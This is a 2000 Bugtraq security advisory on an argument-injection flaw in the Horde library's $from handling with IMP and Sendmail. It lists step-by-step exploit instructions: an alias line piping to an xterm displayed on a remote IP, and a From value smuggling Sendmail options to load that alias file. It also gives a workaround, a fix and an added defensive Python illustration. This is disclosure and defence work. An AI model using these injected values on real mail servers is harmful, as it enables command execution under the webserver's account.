[16808] in bugtraq
Horde library Bug part 2
daemon@ATHENA.MIT.EDU (Steube, Jens)
Mon Sep 18 13:50:48 2000
Message-Id: <27AD015AA2B5D111BD0D00600873390F61FF36@cocbghs0.bgh.coc-ag.de>
Date: Mon, 18 Sep 2000 18:56:14 +0200
Reply-To: "Steube, Jens" <Jens.Steube@COC-AG.DE>
From: "Steube, Jens" <Jens.Steube@COC-AG.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
* Horde Library $from Bug part 2 + How to exploit with IMP and Sendmail *
Description: The fix for the first reported problem with the $from
variable in the Horde library only escaped shell metacharacters,
which prevents direct command execution.
It is still possible to abuse the parsed $from line and
execute commands under the uid and gid of the webserver.
Tested on: Debian 2.2 (potato); others not tested yet.
Release Date: 15/09/2000
Authors: Found, exploited and documented by Jens "atomi" Steube.
Fixed by Christian "thepoet" Winter.
Version: Horde v1.2.1
IMP v2.2.1
The Exploit: e.g. Horde and IMP, with Sendmail (v8.11.0) as the MTA
0. The job is to send a mail to an address
which is defined in an alias file that is manually
added to Sendmail. This alias pipes to a command.
1. Logon to IMP and open a compose window.
2. Locally open a text editor and write a line in MTA alias-file
format. After that, save it locally.
Line e.g.:
evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0"
(or any other command to be executed on the webserver)
3. Upload the locally stored file as an attachment.
4. Open the HTML source code of the compose window
and search for '/tmp'.
5. You will find the filename and path of the attachment
as stored on the webserver.
Copy it to the clipboard.
Note: that filename looks like /tmp/php??????.att
6. Just close the compose window!
7. Open a new compose window.
8. As your FROM-line insert:
Line e.g. (including all quote characters):
<"x@x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx">
9. As your TO-line insert the user alias which you have
defined in the uploaded attachment.
e.g. evil@localhost
10. Leave all other fields blank and send the mail.
11. Exploited.
Other MTAs: The above exploit works with Sendmail in most
configurations, but other MTAs could also be exploited
the same way.
Notice that just disabling the AliasFile flag is not
enough to prevent attacks on this bug, because most MTAs
also provide other command-line switches to include external
configuration.
Workaround: The "$from" var has to be checked for "-" chars following
a space character. Passing those chars unfiltered will
nearly always lead to exploitable bugs or errors.
As neither a mail address nor a name with a leading minus
sign makes sense, here is a small patch that converts
every minus at the beginning of a word into an underscore:
http://ssl.coc-ag.de/sec/index.htm#horde02
Fix: The best solution would be not to pass vars to popen() at all,
but rather to open the pipe to Sendmail by calling
popen("$default->path_to_Sendmail -t")
and to put all available information into the mail header.
This requires some extra checking and converting, but
secures the system a lot.
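The workaround check and the popen()-free invocation described above, as an added Python illustration (not Horde's code; the function names are assumed, the sample From strings are constructed from the advisory, and the alias-file path is a placeholder):

```python
import re
import subprocess

# Added illustration, not Horde's code. Function names are assumptions.
# Constructed sample: the From line from the advisory, with a placeholder
# where the uploaded attachment's /tmp path would go.
MALICIOUS_FROM = ('<"x@x -O QueueDirectory=/tmp '
                  '-O AliasFile=/tmp/php_PLACEHOLDER.att -Fx">')
HARMLESS_FROM = 'Jens Steube <jens@example.invalid>'

# Workaround check from the advisory: a "-" at the start of a word
# (after whitespace, or at the very beginning) becomes an MTA option
# once the string is interpolated into a popen() command line.
_LEADING_MINUS = re.compile(r'(^|\s)-')

def has_leading_minus(value: str) -> bool:
    return _LEADING_MINUS.search(value) is not None

def neutralize_leading_minus(value: str) -> str:
    # What the referenced patch does: a minus at word start becomes an
    # underscore, so the MTA can no longer parse it as a switch.
    return _LEADING_MINUS.sub(r'\1_', value)

def build_sendmail_call(sendmail_path, from_addr, to_addr, subject, body):
    """Fix from the advisory: fixed argv ('sendmail -t'); all user data
    goes into the headers read from stdin, nothing into the command line."""
    # Extra check the advisory alludes to (assumption): a line break in a
    # header value would let the sender smuggle additional headers.
    for name, value in (("From", from_addr), ("To", to_addr), ("Subject", subject)):
        if "\r" in value or "\n" in value:
            raise ValueError(f"{name} header contains a line break")
    argv = [sendmail_path, "-t"]  # no string interpolation, no shell
    message = (f"From: {from_addr}\r\nTo: {to_addr}\r\n"
               f"Subject: {subject}\r\n\r\n{body}\r\n")
    return argv, message

def send(argv, message):
    # subprocess with an argument list never invokes a shell.
    subprocess.run(argv, input=message.encode(), check=True)

if __name__ == "__main__":
    print(has_leading_minus(MALICIOUS_FROM), has_leading_minus(HARMLESS_FROM))
    print(neutralize_leading_minus(MALICIOUS_FROM))
    argv, msg = build_sendmail_call("/usr/sbin/sendmail", MALICIOUS_FROM,
                                    "user@example.invalid", "test", "hello")
    print(argv)  # ['/usr/sbin/sendmail', '-t']
    print(msg)
```

Even the unfiltered malicious From line only ends up as header text here; the -O switches never reach the MTA's argument vector.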
Feedback: Please send suggestions, updates, and comments to
mailto:security@coc-ag.net
http://ssl.coc-ag.de/sec
Disclaimer: The information within this document may change without
notice. Use of this information constitutes acceptance
for use in an AS IS condition. There are NO warranties
with regard to this information. In no event shall the
author be liable for any consequences whatsoever arising
out of or in connection with the use or spread of this
information. Any use of this information lies within the
user's responsibility.
References: Both projects (Horde and IMP) of the Horde group can be
found at http://horde.org
Despite those few bugs, the people there have really
done a great job on free software.